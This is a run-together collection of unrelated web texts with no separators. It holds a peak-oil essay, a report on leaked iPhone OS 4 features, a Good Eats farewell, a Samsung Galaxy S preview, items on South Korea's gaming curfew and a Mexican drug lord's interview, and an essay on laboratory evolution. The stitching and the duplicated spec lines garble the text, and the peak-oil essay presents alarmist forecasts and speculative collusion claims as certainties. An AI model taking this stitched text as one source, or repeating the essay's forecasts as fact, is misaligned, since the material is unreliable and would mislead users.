If you believe the graph , demand will outstrip supply starting at the end of 2011 , and severely outstrip supply in five years .
What are we going to do , and how are we going to do it ?
We have no time to decide .
IS THE GRAPH RIGHT ?
It is very unlikely that things can be better than the graph indicates .
Why ?
The great majority of authorities believe there is little more than 1 trillion barrels of conventional oil left .
You can make a simple calculation from that :
At the present rate of 30 billion barrels per year , 82 million barrels per day , it will all be gone in 33 years , and consumption has been rapidly increasing , not decreasing , so if anything it will all be gone sooner ...
A closer look at the graph reveals that it was drawn on the assumption that the world 's existing conventional fields contain only 750,000 barrels at this time , enough to keep us going only 25 years .
The graph assumes a decline rate of 4 % per year .
As long as the estimates of remaining reserves are right , that can't be far off .
In fact , 4 % is a relatively low decline rate compared to what has been observed in oil fields generally .
Hold on , it 's going to be a fast ride down !
The major oil companies , which presumably know better than we do how much oil is in their possession , " conspicuously fail to invest in new refining capacity , which would surely be needed if production were set to rise . ' "
Campbell , http://www.greatchange.org/ov-campbell,outlook.html .
The excess of refining capacity over demand remained close to 10 million bpd during the nineties , but dropped to almost nothing in the last decade as a result of failure to build new capacity .
http://www.imf.org/external/pubs/ft/weo/2006/01/chp1pdf/fig1_21.pdf.
The United States Joint Forces Command has also reported the failure of the oil industry to invest in the refining capacity necessary to permit expanded production , and that " Even were a concerted effort begun today to repair that shortage , it would be ten years before production could catch up with expected demand . "
" Joint Operating Environment 2010 , " at 26 .
http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf
The most frequiently discussed significant source of unexploited petroleum is the tar sands of Alberta , Canada .
Because a high percentage of the energy value of the tar sands has to be expended in their extraction , the reported quantity of reserves is misleading , and two independent researchers have estimated respectively that production from the tar sands by 2020 may be expected of 3.3 milion bpd and 4 million bpd .
Consequently , the likelihood of the tar sands making a significant contribution to the world 's petroleum demand in the foreseeabe future is low .
Phil Hart and Chris Skrebowski , " Peak oil : A detailed and transparent analysis , " http://www.energybulletin.net/node/30537
The shortfall , labelled " unidentified projects , " that needs to be filled in 20 years is an unprecedented 60 million barrels per day , equivalent to 3 / 4 of today 's total production .
We have never in history done anything comparable to that .
Although there are large deposits of " unconventional " oil such as the Canadian tar sands , most are making only slow progress at development and consume as much or more energy in their production as they can generate .
The independent Oxford Institute of Energy Studies has estimated a possibe development of 6.5 mbpd of such projects , when we 'll need more than that every two years just to keep our place .
So the likelihood of anything at all making a significant dent in the shortfall is small .
Indeed , the " unidentified projects " can be perceived as just a " euphemism for rank shortage " ( Campbell http://www.greatchange.org/ov-campbell,outlook.html)
The United States Joint Forces Command has come to the similar conclusion : that of all potential future energy sources , " None of these provide much reason for optiimism , " http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf
Petroleum industry investment banker Matt Simmons calls them " faith - based . "
http://www.simmonsco-intl.com/files/Northern%20Trust%20Bank.pdf at 4
The " Hubbert Peak " theory of oil field depreciation , which predicted the peak and subsequent demise of the US oil inudtry 15 years in advance and within 2 years of its occurence http://www.hubbertpeak.com/hubbert/1956/1956.pdf, says that with normal production methods , a country reaches peak production in its oil fields when they are 50 % depleted , with the production curve being bell - shaped .
The peak can be postponed with innovative extraction techniques , but this only causes subsequent more rapid decline of the deposits and total extraction if anything decreasing .
The world reached the midpoint of its reserves in the last decade , so the 2005 " peak " implied by the above graph is very close to what would be expected .
Astonishingly , Dr. Hubbert in the same 1956 paper predicted , based upon records of only 90 billion barrels of oil having been recovered worldwide , that the peak of world petroleum production would be approximately the year 2000 ; this apparently quite accurate prediction by Hubbert has largely been forgotten .
http://www.hubbertpeak.com/hubbert/1956/1956.pdf
.
One is tempted to ask why , if one man could predict the timing of the peak 44 years before it occurred , the United States Department of Energy is incapable of recognizing it after it occurred .
There 's a common feeling that just becase we do n't know where the oil is , does n't mean the Mother Lode is n't right around the corner .
But if you 've looked everywhere , the chances are a lot slimmer .
The lag time between discovery and bringing to full production of a field is 30 - 40 years , which means that even the virtually impossible discovery of another Saudi Arabia would barely change the graph above , of production between now and 2030 .
But no such discoveries are left to be made .
The rate of discovery of new conventional oil has been steadily dropping now for FORTY years despite ever - more searching with ever - more - sophisticated technology .
There have been two pivotal events : the peak of discovery around 1968 , and the day in 1981 ` when discovery of new oil deposits no longer kept up with production .
There is nothing complicated about this .
As Campbell says , the warning sign there for anyone to see
" simply recognised two undeniable facts :
You have to find oil before you can produce it
Production has to mirror discovery after a time lag
" Discovery reached a peak in the 1960s - despite all the technology we hear so much about , and a worldwide search for the best prospects .
It should surprise no one that the corresponding peak of production is now upon us . "
Indeed , Campbell 's second point means that the inevitable peaking of oil production in the early 21st century , should have been clear for all to see since the peaking of discovery in the late sixties .
Campbell does not stand alone .
As the US Joint Forces Command observes , " The discovery rate for new oil and gas fields over the last two decades ( with the possible exception of Brazil ) provides little reason for optimism that future efforts will find major new fields . "
" Joint Operating Environment 2010 , " at 31 .
Saudi Arabia 's largest field , the Ghawar , is now in decline and it appears that the country has nothing to offset that decline .
That has led many to conclude that " Peak Oil is a Done Deal . "
( Dave Cohen , ASPO / USA Energy Bulletin , July 16 , 2008 .
http://www.energybulletin.net/node/45940)
IF IT'S A " DONE DEAL , " WHY DID IT TAKE UNTIL THE LAST MINUTE TO GET HERE ?
" We can wish it , we can dream it , but it will never be , oil is not renewable , and therefore in time it must be realized that THERE WILL BE NO OIL . "
ENO Petroleum Corporation , " Peak Oil - The Global Oil Crisis , " http://www.enopetroleum.com/opecoilreservers.html.
It is hard to conceive of an act or omission causing more pain to more people and creatures than the failure of " those in charge " to announce with reasonable forewarning that the oil supply was going to crash .
But it is upon us with no forewarning to the general public at all .
The government planning agencies charged with helping the public survive the end of oil could not have performed worse than by recognizing peak oil only after it has happened .
Like anthropogenic global warming ( " AGW " ) , " peak oil " has been the subject of decades of denial .
Notwithstanding Hubbert 's famous coup in pinpointing the peak of US oil production through the simple observation that production naturally peaks when the supply is half gone , few would listen that because the worldwide supply of conventional oil would reach the halfway point in the first decade of this century , trouble was right around the corner .
The fact is , coming to that point meant we were in trouble regardless , because the early stages of development of an oil field ( like the early stages of growth of virtually anything else ) follow an exponential growth curve , and the world 's growth addicts love exponential curves , but once you get beyond the halfway point , it is a mathematical certainty that the longer you attempt to conform the field to a pattern of exponential growth , the more the end is going to be precipitous .
If you do n't decelerate rapidly , that is preciely what has to happen - the decline after the halfway point can only be more rapid than the rise beforehand .
What Hubbert observed with respect to the US oil reserves has an intuitive sense to it - as the amount of oil in the field drops , its pressure drops , so the flow begins to slow down - the gusher goes down to a trickle .
But if the owner of the field does n't make full disclosure of what 's there , outsiders can only make educated guesses from general geological principles and what the owner is selling , as to what the future holds .
And as we all know , full disclosure is not the name of the game in the oil business .
If the field is just allowed to release its liquid gold at its natural rate , that 's not too bad , because observations like the Hubbert Peak can be applied .
But as technology improves and well pressure can be jacked up to compensate for declining reserves , ( for instance by pumping water into the wells ) the outside observer loses certainty ..
There remains information about the company 's reserves , but the accuracy of that information is seriously open to question .
Within OPEC , which allows its members to market in accordance with the amount of their reserves .
Hart , " Introduction to Peak Oil , " www.philhart.com/content/introduction-peak-oil, there are great temptations to fudge .
Outside observers can follow a country 's reports on its reserves , but those reports are highly suspect .
They will remain constant for years while the country is pumping great amounts of oil without reporting any new discoveries , and indeed they can take sudden leaps upward also without reports of new discoveries .
Such " records " lead to the inevitable conclusion that many OPEC reserves reports are fictional .
If you would like to see charts of OPEC oil reserves mysteriously contorting themselves , you are invited to take a look at Hart 's essay .
So if you thought the experts had it all in hand and would reliably warn us when trouble was a' brewin ' , think again .
Not only do OPEC members have internal business reasons to exaggerate their reserves , but companies on the public stock market want to satisfy their stockholders of their long - term viability , and all oil producers want to make their customers confident that they can rely on oil for the long haul .
By concealing their future from homeowners , oil companies have made trillions for the real estate business and the banks at the expense of those who chose urban sprawl over dense " near - in " housing , and the companies themselves will make trillions in the near future selling to consumers trapped into oil addiction , who might have sought alterntives more vigorously had they known how close the crash was .
Matt Simmons , the banker who has spent his post - Harvard - Business School career advising oil companies and seving as peak oil advisor to the last Presidential administration and specifically to President Bush , ought to know .
And what he says is that Western oil companies like ExxonMobil would be strongly opposed to the idea of transparent data because it would reveal “ how crappy and old their fields really are . ”
Energy TechStocks.com , " Meeting the Challenge Matt Simmons : Force All Oil Producers to Give Transparent Data , " According to EnergyStocks.com , Simmons has warned that " the failure of Saudi Arabia and other major oil producers to provide transparent production data has left the world in a lurch , unable to know whether it can maintain an adequate supply of oil in the face of burgeoning demand Such uncertainty has led to indecision about whether the world should invest the huge sums of money necessary to develop alternative transportation fuel sources . "
Just how bad the published reserve figures for the major oil - producing nations are , has long been understood .
We like to say that what goes up , must come down , but not OPEC member - nation oil reserves .
Their allowed production quotas depend upon their reserves , so there is a built - in temptation to overstate reserves and never reflect in reduiced reserve figures , what they have pumped out .
In 1988 , the OPEC oil reserves " magically and miraculously increased twofold , " without any corresponding discovery of new fields .
The officially reported reserves follow graphs that would be comical were it not for the fact that 6.8 billion people , and counting , depend upon the real numbers .
See http://www.enopetroleum.com/opecoilreservers.html
Now we are facing the consequences of the major oil producers " leaving the world in a lurch " : almost complete inability to cope with the severe difficulties we face in transporting , feeding , housing , and keeping warm the burgeoning billions of our numbers .
It is hard to conceive of how any private entity could impose so much pain on so many .
It did n't need to be that way .
The US Government and its cohorts around the world could have imposed transparency on the oil companies as to their true reserves , and we would have had fair warning and the possibiity of coping .
Yes , and the moon could be made of green cheese .
Of course , as noted , it is possible to produce a graph roughly like the one above with nothing more than production data and reserves data .
The former are public , and the latter are known to a limited extent .
It has been the consensus of decisionmakers for many years that the world had a total ( both produced and still in the ground ) of approximately 2 trillion barrels of conventional oil , and as pointed out by Campbell , four decades of dwindling discoveries have left us with an absolute inability to increase available reserves in a timely manner to mitigate the looming shortfall .
The two trillion barrel figure was absolutely critical for doing what planning could be done , but at the beginning of the last decade , the US broke ranks with the consensus of the rest of the world , declared through the historically - reliable US Geological Survey ( USGS ) that world reserves of conventional oil ( both consumed and yet - to - be- consumed ) were in fact in the neighborhood of three trillion barrels rather than two , a claim which if true immediately provided the world by sleight of hand with an extra thirty years ' supply at present consumption rates .
To be sure , USGS former employees disputed its estimates as relying " heavily on guesses to calculate new oil discoveries , " and on doubling the usual 30 percent recovery rate from reserves " with no technology in mind capable of doing that . "
Gordon , " Worries Swelling Over Oil Shortage , " Energy Bulletin March 20 - , 2005 .
The concerns about overestimation of discoveries proved correct : they continued on their downward track .
This alone created a discrepancy between the USGS projections and reality of approximately 900 billion barrels .
At the same time , the production data appeared to peak in 2005 , prominent Princeton University petroleum geologist Kenneth Deffeyes predicted that 2005 was the year , and Simmons suggested similar concerns .
http://www.energybulletin.net/node/4835 and http://www.simmonsco-intl.com/files/Northern%20Trust%20Bank.pdf ( p. 31 ) .
Nonetheless , based upon the USGS wishful thinking , during the Bush Administration , the Department of Energy was forecasting a " production peak somewhere between 2021 and the start of the next century , with 2037 the most likely date . "
http://www.energybulletin.net/node/4835
Not to worry .
With the peak imminent in reality , like the global warming " scientific skeptics , " industry in 2006 came up with a " theory " published in a non-peer - reviewed report , that " peak oil " was in its totality a false concept , and that the true behavior of an oil field or conglomeration thereof was a peak followed by an " undulating plateau " and then a gentle decline by around 2 % per year , years , perhaps decades later .
According to Cambridge Energy Research Associates ( CERA ) , " “ It is likely that the situation will unfold in slow motion and that there are a number of decades to prepare for the start of the undulating plateau .
This means that there is time to consider the best way to develop viable energy alternatives that would eventually provide the bulk of our transport energy needs . "
www.cera.com/aspx/cda/public1/about/about.aspx
Not to worry .
CERA faulted the " peak oil " proponets with failure to take into acount the facts that reserve estimates evolve with time and that so does the technology used in extracting oil .
The criticism is disingenuous given that the industry refuses to disclose either the technology it is using at any one time or its true reserves , and the reserve estimates evolve with time more for political reasons than geological one ..
The facts the proponents of " peak oil " fail to take into account are facts that the industry will not disclose .
As Simmons has pointed out , " With solid global field - by - field production data , ' Peak Oil timing could be ' proved ' . "
And , or course , if the " undulating plateau " theory is correct , all the industry has to do is to disclose their true facts to prove it , but they wo n't .
Regardless , average decline rates of an oil sujpply are dictated by only two numbers : how fast we are now using the oil , and how much is left .
Lower decline rates now mean higher decline rates later .
Those are immutable facts even if the " undulating plateau " is correct .
So to avoid a rapid decline in available oil , we must discover and bring to production staggeringly large new supplies , right now today .
Nonetheless , the CERA " theory " has sufficiently intimidated the bureaucrats that DOE 's official position at the moment , as expressed to Le Monde , notwithstanding the graph , is that we are " entering a plateau . "
petrole.blog.lemonde.fr:80/2010/03/25/washington-considers-a-decline-of-world-oil-production-as-of-2011/
At the same time all of this was happening , the UN , the US Congress , the Obama Administration and the oil industry were negotiating over goals for global warming legislation .
Miraculously , although arguably coincidentally , the percentage - reduction goals agreed to fit quite precisely the percentage reductions in oil consumption that will be physiclly forced upon us all if you believe the above graph : an 18 % drop from 2005 by 2020 , and an 85 % drop from 2005 by 2050 .
( It is possible to extrapolate the graph , which assumes exponentially dropping levels of existing reserves at a 4 % per year rate . )
This compares to reductions of CO2 emissions 17 % from 2005 in 2020 and 80 % from 2005 in 2050 in the bill .
So it would appear that the legislative goals have been set , for whatever reason , so that the oil industry will have to do little if anything it wo n't have to do in any event because of dwindling reserves .
http://ecoglobe.ch/energy/e/peak9423.htm
.
It is hard to see how the negotiators could have come up with such correspondence if they had not all been aware of the impending crash of production and the expected decline rate ..
Coincidence ?
Maybe , but somehow it seems unlikely .
Whether or not by intent , the goals fit the needs of the oil companies rather than the needs calculated by the scientists .
In short , with all the evidence available , it is hard to see how the industry and the Department of Energy could have failed to see this coming .
Their failure to warn the public , given the consequences , verges on the criminal .
And if somehow they can claim innocence , then we still have to ask why they did not heed the warning of Matt Simmons , advisor on peak oil to the Bush administration , as to the importance of transparency .
But they did not , and here we are .
CONCLUSIONS
We are on our own .
We are rapidly going to have to deal with less and less oil , since there has been no forewarning and no planning .
It is a time for communities to prepare for community energy independence , because only that way will be safe .
This means relying on the sun and wind and water that have always been with us .
It means cooperation with each other to get through seriously difficult times .
It means finding altenatives to oil throughout our lives as quickly as possible - the oil that runs our cars , the oil that heats our houses , the oil that runs generators for our electricity , the oil from which chemical fertilizers and insecticides and plastics and polyester are made , the oil that brings countless manufactured goods to us from overseas , the oil on which farmers depend for irrigation pujmps , for transporting produce to market , for working the soil to bring us food .
If you believe the graph , it will almost all be gone in 20 years .
And the progressives and Tea-Partyers must remember that the people who brought this calamity to us are not our friends but are people we trusted and they trusted , so we must work together to cope with the mess that is upon us , and " to throw the rascals out . " .
The author , Nicholas C. Arguimbau , is an appellate and environmental lawyer licensed in California and residing in Western Massachusetts .
He may be contacted at narguimbau@earthlink.net .
One day has passed since Apple gave developers a sneak preview of iPhone OS 4.0 , and already there 's new ( NDA - breaking ) information floating around about the other 90 - some features that Steve Jobs did n't discuss at Apple 's media event .
In addition to renewed evidence that Apple may add a front - facing camera and other camera - related features , developers with access to the beta have told Ars about even more tidbits buried within , essentially making OS 4.0 a piñata of API goodies for devs to beat on .
Thursday 's announcement immediately turned up evidence that Apple might be adding a flash to the iPhone 's camera , thanks to functions named VCaptureDevice .
has Flash , AVCaptureDevice.flashMode , and AVCaptureDevice.hasTorch .
Apple is allegedly investigating LED flash options , which would make such a feature very BlackBerry - like .
Additionally , the latest iPhone SDK continues to contain hints about a front - facing camera as well as iChat support .
That 's just the tip of the iceberg when it comes to the hidden gems in OS 4.0 .
Several developers told
Ars that this is the single biggest update to iPhone OS that they have seen .
The SDK contains plenty of references to expanded A/V capabilities and media handling .
There is also expanded support for VoiceChat — particularly within Apple 's just - introduced social gaming platform GameKit — as well as a perplexing reference to Microsoft 's Direct3D .
There are also a number of API references to the creating , reading , and editing of media , leading some developers to believe that Apple could build something like iMovie or GarageBand for iPad ( though third - party Garage Band - type apps are already quite common ) .
In addition to video - related references like layering and frame durations , developers can also get metadata from all manner of video and audio files .
This is in addition to details about some of the features that were announced yesterday , such as access to accelerated math libraries ( such as linear algebra , vector digital signal processing , and more ) , the ability for apps to mark files as " protected " ( part of Apple 's new enterprise features ) , and direct access to QuickLook , tap to focus , and the camera 's white balance .
The final version of iPhone OS 4 is n't expected to appear until sometime this summer , likely coinciding with another iPhone hardware refresh from Apple .
As the rest of us wait for the chance to play with the new software , there 's sure to be more leaks about what we can expect to see in a few months .
Are there any unannounced features that you 're keeping your fingers crossed for ?
Good Eats with Alton Brown is almost over .
The last one - hour episode is in the can and will air sometime in early 2012 from what I hear ... just before the world ends .
I want to say how wonderful it's been being the self - proclaimed # 1 aficionado .
AB and his staff has been gracious enough to allow me to have a small part both in front and behind the camera .
And it 's given me no end of joy to know that our transcripts here at the fan page have been valuable as a resource for his research staff .
So thank you , Mr. Brown , for 12 years of excellent Food Network programming .
We wish you and Be Squared Production the best in all of your future endeavors .
You 've educated in the masses in cooking , science , history , lore and proper kitchen thinking .
I 'm sure Good Eats will be a valuable assistance to many generations of future cooks like it has for this one .
So if you 're here for the food , head on over to transcripts of every episode along with reams of other Good Eats information .
Oh , and do n't forget to play with your food !
This article is outdated .
We have already published a full review .
Introduction
Competition is certainly one of the things that make the Android OS so much fun .
There are already several manufacturers involved in the Google OS game and each of them has already released a flagship that aims at the peak of the food chain .
Samsung I9000 Galaxy S official shots
Samsung might be coming a tad late to the party but they are obviously entering with a bang .
The I9000 Galaxy S packs a display of the greatest technology that the mobile world has ever seen and a pretty big one at that .
A snappy 1GHz Cortex A8 CPU , HD video recording and a sweetly slim waistline make it look like the real deal in the eyes of every real geek .
Let ’s take a look at the other features that the Samsung I9000 Galaxy S puts to the table .
Samsung I9000 Galaxy S at a glance :
General : GSM
850/900/1800/1900 MHz , UMTS 900/1900/2100 MHz , HSDPA 7.2 Mbps , HSUPA 5.76 Mbps
GSM 850/900/1800/1900 MHz , UMTS 900/1900/2100 MHz , HSDPA 7.2 Mbps , HSUPA 5.76 Mbps Form factor : Touchscreen bar phone
Touchscreen bar phone Dimensions : 122.4 x 64.2 x 9.9 mm , 118 g
122.4 x 64.2 x 9.9 mm , 118 g Display : 4 " 16 M - color Super AMOLED capacitive touchscreen , 480 x 800 pixels
4 " 16M - color Super AMOLED capacitive touchscreen , 480 x 800 pixels CPU : Samsung Cortex A8 Hummingbird 1 GHz processor
Samsung Cortex A8 Hummingbird 1 GHz processor OS : Android 2.1 ( Eclair )
Android 2.1 ( Eclair ) Memory : 8/16 GB storage , microSD card slot
8/16 GB storage , microSD card slot Camera : 5 megapixel auto - focus camera with face detection and touch focus ; 720 p video recording at 30fps
5 megapixel auto - focus camera with face detection and touch focus ; 720 p video recording at 30 fps Connectivity : Wi -Fi , Bluetooth 3.0 with A2DP , standard microUSB port , GPS receiver with A - GPS , 3.5 mm audio jack , FM radio
Wi -Fi , Bluetooth 3.0 with A2DP , standard microUSB port , GPS receiver with A - GPS , 3.5 mm audio jack , FM radio Misc : TouchWiz 3.0 UI , built - in accelerometer , multi - touch input , proximity sensor , Swype text input
As you can see the Samsung I9000 Galaxy S specs sheet is long enough to be considered high - end .
What ’s even better is that it manages to put something on top , namely the large 4 ” Super AMOLED display , which should become the new thing to beat if it has the performance of the Samsung S8500 Wave unit .
The Samsung I9000 Galaxy S at ours
The TouchWiz - like Android customization still had some performance issues on the Galaxy Spica so we will have to see if those are fixed for the Galaxy S . We are also yet to check out how the new 1GHz Samsung Cortex A8 CPU compares to its Snapdragon peers in the Android environment , but we have a good feeling about it .
At any rate the Samsung I9000 Galaxy S is a fine piece of mobile technology and we are as eager as you to see if it will actually manage to top the charts or end up in the chasing pack .
So let ’s not waste any more time and head to the hardware part of the preview where we ’ll examine the Galaxy S ergonomics .
Online gaming is hugely popular in South Korea .
The South Korean government is introducing policies aimed at curbing the amount of time children spend playing online games .
The first involves barring online gaming access to young people of school age between 12 am ( midnight ) and 8 am .
The other policy suggests slowing down people 's internet connections after they have been logged on to certain games for a long period of time .
The Culture Ministry is calling on games providers to implement the plans .
It is asking the companies to monitor the national identity numbers of their players , which includes the age of the individual .
Parents can also choose to be notified if their identity number is used online .
" The policy provides a way for parents to supervise their children 's game playing , " Lee Young - ah from the Ministry of Culture , Sports and Tourism told Reuters .
The Korea Herald reports that Barameui Nara , Maple Story and Mabinogi , three popular virtual worlds , will introduce the blackout later this year .
HAVE YOUR SAY
The internet requires self control and regulation by parents of their children wind - blown
Meanwhile role playing games " Dungeon and Fighter " and " Dragon Nest " will pilot the connection slowing scheme .
A total of 19 role playing games will eventually be included - a huge proportion of the online gaming market in the country .
South Korea has sophisticated high speed broadband connections and online gaming is enormously popular .
But there has been growing concern over the amount of time its citizens spend in virtual worlds and playing online games .
A couple whose baby daughter starved while they spent up to 12 hours a day in internet cafes raising a virtual child online have made headlines around the world .
They were charged with negligent homicide and are due to be sentenced on 16 April .
Everyone here has something to say about the Mexican drug war .
Opposition politicians say the president ’s military - led strategy has failed .
Many residents who once supported the government 's hard line now question its effectiveness .
IN PICTURES : Mexico 's drug war
The United States says authorities must shift attention to the roots of the violence .
Now , even drug traffickers themselves are having a say .
In a rare interview granted to the liberal news magazine Proceso in Mexico , Ismael “ el Mayo ” Zambada , who is allied with Mexico ’s most wanted drug trafficker , Joaquin “ Shorty ” Guzman from the Sinaloa cartel , says that Mexican President Felipe Calderón ’s efforts are bound to fail .
Most people here are n’t inclined to care what a drug trafficker has to say about the state of security in Mexico .
In fact , officials refused to comment on the interview , which was published Sunday .
But it does n’t change the fact that his words coincide with what many others are thinking these days .
' El Mayo ' speaks
“ One day I will decide to turn myself in to the government so they can shoot me ....
They will shoot me and euphoria will follow .
But at the end of days we ’ll all know that nothing changed , ” Mr. Zambada was quoted as saying in the magazine whose cover features a photo of Zambada with his arm around Proceso founder Julio Scherer .
“ Millions of people are wrapped up in the narco problem .
How can they be dominated ?
For all the bosses jailed , dead , or extradited , their replacements are already there , ” said Zambada .
He has a point .
President Calderón dispatched troops and federal police across the country to wipe out organized crime when he took over the presidency in December 2006 .
But since then , Mexico has gotten more violent , not less , with more than 18,000 people killed in drug - related violence .
It is unclear why Zambada , a fugitive for years who reportedly contacted Proceso to set up the interview , wanted to grant one .
Clandestine interview
Mr. Scherer says he received an anonymous note with Zambada ’s request , with a time and place that he would be transported to his interview .
Several car rides later and after a night spent in an uninhabited house , he finally made it to a hideout in the mountains , where the interview proceeded over a breakfast of beans , toast , juice , and coffee .
IN PICTURES : Mexico 's drug war
Olivia Judson on the influence of science and biology on modern life .
Here ’s a problem : evolution never stops .
Imagine you ’re a wild fruit fly , of the species Drosophila melanogaster .
You ’re happily feasting on some yeast that ’s growing on rotting fruit when , whoomf , you get sucked into a bottle and taken to a laboratory .
From now on , this is your home .
Life in a bottle — or cage — is different from life in the wild .
In nature , for example , fruit flies reproduce throughout their adult lives .
Often , in the laboratory , they do not : flies grown in bottles may only be allowed to reproduce for the first five or six days after emerging from the pupa .
( Wild flies can live for more than 80 days . )
In nature , flies choose their mates .
Often , in the laboratory , they do not : they are often assigned to one , and that one may be a close relative .
On top of that , the food is different ; infectious diseases are rare ; predators are absent .
In short , the pressures of daily life have been transformed — and traits that were an advantage Out There may no longer be so Inside .
Similarly , traits that would have killed you in the wild may help you get along inside a bottle .
If , for example , older flies are never allowed to reproduce , the ability to lay eggs later in life becomes irrelevant , so there ’s nothing to prevent the appearance of mutations that interfere with that ability .
Indeed , if those mutations increase early fertility , they may even be favored : the most fecund young flies are likely to leave the most descendants .
Thus , the switch from the wild to the laboratory immediately alters the evolutionary trajectory of a population — and sure enough , within a few generations , laboratory - bred life - forms become noticeably different from their wild cousins .
Exactly what happens depends on how the organisms are kept — different rearing methods create different evolutionary forces .
But in general , laboratory Drosophila melanogaster evolve shorter lifespans than wild flies ; they become less able to cope with stresses like starvation or desiccation ; and their pattern of fertility changes .
As you ’d expect , females reared in bottles evolve to be hugely fecund as young flies but much less so when they are older .
Also as you ’d expect , laboratory evolution is not unique to Drosophila melanogaster .
In the wasp Nasonia vitripennis , females descended from a long line of laboratory wasps evolve to be more prone to promiscuous sexual behavior than wild wasps .
In the Mediterranean fruit fly , Ceratitis capitata , laboratory - reared females evolve to be less fussy about who they mate with , and male sexiness changes .
Wild female medflies do n’t find laboratory - reared males as attractive as they find wild males .
Mexican fruit flies , Anastrepha ludens , have the same problem : laboratory males have evolved in such a way that they are less popular with wild females .
Mice show a host of changes , too .
Compared to their wild relations , laboratory mice are typically bigger , more docile , reach sexual maturity earlier and die younger .
Some of these changes can appear quickly : one study found that the ability to reproduce later in life declined within 10 generations of the mice being bred in the laboratory .
Intriguingly , laboratory mice also have longer telomeres than wild mice .
( Telomeres are the segments of DNA at the ends of chromosomes ; they are thought to play a role in aging and cancer . )
Since no one is deliberately breeding mice for extra-long telomeres , this must arise as some consequence of laboratory life .
But what ?
That ’s not clear .
One possibility is that it ’s due to inbreeding — for lab mice are often highly inbred .
Consistent with this , one study of white - footed mice , Peromyscus leucopus , found that , when animals were forced to inbreed , telomeres lengthened substantially in fewer than 30 generations — although why this should be so is entirely mysterious .
All of which is fascinating .
But does it matter ?
That depends .
For some scientific problems , the fact that laboratory life - forms evolve substantial differences from their wild relatives is irrelevant .
For others , however , it matters a lot .
Let me give you two examples .
Adaptation to the laboratory — or to captivity more generally — can make it much more difficult for organisms to thrive if they are later released to the wild .
This has important implications for the conservation of endangered animals and for the control of pests .
Captive breeding programs have been important tools for re-establishing wild populations of species such as the California condor ; but not all programs are successful .
Genetic changes in captivity may be one reason .
Similarly , many pest control programs depend on the “ sterile male technique , ” whereby males are bred in the laboratory , sterilized , then released into nature to mate with wild females .
For this to work , the wild females must find the laboratory males attractive .
Changes in mating behavior like the ones I mentioned earlier can , therefore , quickly reduce the effectiveness of the approach .
A second area where laboratory evolution can be a serious problem is in the study of subjects like the evolution of aging , and the diseases associated with it .
For example , the study of laboratory populations may give a misleading impression of how easy it is to extend lifespans : since laboratory organisms tend to have unnaturally short lifespans , discovering ways to make them live longer may not be especially informative .
We may simply be reversing the unnatural shortening that we created in the first place , a view supported by the fact that selection to increase lifespan in laboratory populations often simply restores it to levels seen in the wild .
Such realizations have led an increasing number of scientists to argue that long - established laboratory populations are “ suspect starting material ” for understanding aging , and that comparisons with wild populations “ support the pessimistic interpretation that laboratory - adapted stocks of rodents may be particularly inappropriate for the analysis of the genetic and physiological factors that regulate aging in mammals . ”
For some subjects , it ’s better to go wild .
Notes :
For an interesting overview of evolution in the laboratory , see Artamonova , V. S. and Makhrov , A. A. 2006 .
“ Unintentional genetic processes in artificially maintained populations : proving the leading role of selection in evolution . ”
Russian Journal of Genetics 42 : 234-246 .
A large number of studies have found evidence of evolution to laboratory conditions .
For Drosophila melanogaster , I drew , in part , on Sgrò , C. M. and Partridge , L. 2000 .
“ Evolutionary responses of the life history of wild - caught Drosophila melanogaster to two standard methods of laboratory culture . ”
American Naturalist 156 : 341-353 .
This paper shows how differences in laboratory rearing methods can affect evolutionary trajectories , and also shows how truncating the reproductive life of adult flies rapidly leads to flies evolving to reproduce more earlier ; compared to wild flies , laboratory flies had shorter lives .
For laboratory populations being “ suspect starting material ” for aging studies , see page 351 of this paper .
For the lifespan of wild flies compared to laboratory flies , see Linnen , C. , Tatar , M. and Promislow , D. 2001 .
“ Cultural artifacts : a comparison of senescence in natural , laboratory - adapted and artificially selected lines of Drosophila melanogaster . ”
Evolutionary Ecology Research 3 : 877-888 .
These authors show that wild flies live longer than standard laboratory flies , and that lines of flies that have been bred specifically to have long lifespans do not live longer than wild flies .
For laboratory rearing leading to loss of resistance to desiccation and starvation , see Hoffmann , A. A. et al. 2001 .
“ Rapid loss of stress resistance in Drosophila melanogaster under adaptation to laboratory culture . ”
Evolution 55 : 436-438 .
For promiscuous laboratory wasps , see Burton - Chellew , M. N. et al. 2007 .
“ Laboratory evolution of polyandry in the parasitoid wasp Nasonia vitripennis . ” Animal Behaviour 74 : 1147-1154 .
For evolution in the mating behavior of laboratory populations of medflies , see Rodriguero , M. S. et al. 2002 .
“ Sexual selection on multivariate phenotype in wild and mass - reared Ceratitis capitata ( Diptera : Tephritidae ) . ”
Heredity 89 : 480-487 .
For the same phenomenon in Mexican fruit flies , see Rull , J. , Brunel , O. and Mendez , M. E. 2005 .
“ Mass rearing history negatively affects mating success of male Anastrepha ludens ( Diptera : Tephritidae ) reared for sterile insect technique programs . ”
Journal of Economic Entomology 98 : 1510 - 1516 .
These papers also discuss the problems that laboratory evolution pose for pest control .
An additional analysis of this is provided by Hendrichs , J. et al. 2002 .
“ Medfly areawide sterile insect technique programmes for prevention , suppression , or eradication : the importance of mating behavior studies . ”
Florida Entomologist 85 : 1-13 .
For an overview of evolutionary changes in laboratory mice , see Miller , R. A. et al. 2002 .
“ Longer life spans and delayed maturation in wild - derived mice . ” Experimental Biology and Medicine 227 : 500-508 .
This paper shows that wild - caught mice live much longer than most laboratory mice , and reach sexual maturity later .
These authors are also responsible for the “ pessimistic interpretation ” quotation ; see page 507 .
For the study showing that the ability to reproduce later in life can decline within 10 generations of laboratory residence , see Flurkey , K. et al. 2007 .
“ Pohn B6F1 : a cross of wild and domestic mice that is a new model of extended female reproductive life span . ”
Journal of Gerontology , Biological Sciences 62A : 1187-1198 .
For laboratory mice having weirdly long telomeres , see Hemann , M. T. and Greider , C. W. 2000 .
“ Wild - derived inbred mouse strains have short telomeres . ” Nucleic Acids Research 28 : 4474-4478 .
For inbreeding producing long telomeres in white - footed mice , see Manning , E. L. et al. 2002 .
“ Influences of inbreeding and genetics on telomere length in mice . ” Mammalian Genome 13 : 234-238 .
For the possibility that evolution in captivity may pose a potential problem for captive breeding programs , see Woodworth , L. M. et al. 2002 .
“ Rapid genetic deterioration in captive populations : causes and consequences . ”
Conservation Genetics 3 : 277-288 ; and Williams , S. E. and Hoffman , E. A. 2009 .
“ Minimizing genetic adaptation in captive breeding programs : a review . ” Biological Conservation 142 : 2388-2400 .
